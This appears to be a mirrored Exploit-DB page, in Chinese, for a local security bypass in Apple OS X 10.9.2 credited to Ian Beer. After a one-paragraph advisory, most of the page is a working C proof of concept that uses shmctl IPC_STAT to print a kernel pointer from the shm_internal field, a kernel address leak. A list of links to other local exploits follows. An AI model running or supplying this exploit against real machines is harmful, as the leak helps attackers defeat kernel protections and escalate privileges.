Apple Mac OSX – Local Security Bypass

Exploit Database
9 阅读

作者： Ian Beer

日期： 2014-04-22
类别：
- local
平台：
- osx
来源：https://www.exploit-db.com/exploits/39147/

// source: https://www.securityfocus.com/bid/67023/info

Apple Mac OS X is prone to a local security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.

Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected. 

#include <stdio.h>
#include <strings.h>
#include <sys/shm.h>

int main(int argc, char *argv[])
{
int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );

if (shm < 0)
{
printf("shmget: failed");
return 6;
}

struct shmid_ds lolz;

int res = shmctl( shm, IPC_STAT, &lolz );
if (res < 0)
{
printf("shmctl: failed");
return 1;
}

printf( "%p\n", lolz.shm_internal );

}

last Exploits
Apple Mac OSX – Local Security Bypass的更多信息

Tuneclone 2.20 – Local SEH Buffer Overflow：
AppXSvc – Privilege Escalation：
ERS Viewer 2011 – ‘.ERS’ File Handling Buffer Overflow (Metasploit)：
PowerShell XP 3.0.1 – Local Buffer Overflow：
VX Search Enterprise 9.7.18 – Local Buffer Overflow：
Ipswitch IMAIL 11.01 – Reversible Encryption + weak ACL：
NoMachine < 6.0.80 (x86) - 'nxfuse' Privilege Escalation：
Disk Savvy 13.6.14 – ‘Multiple’ Unquoted Service Path：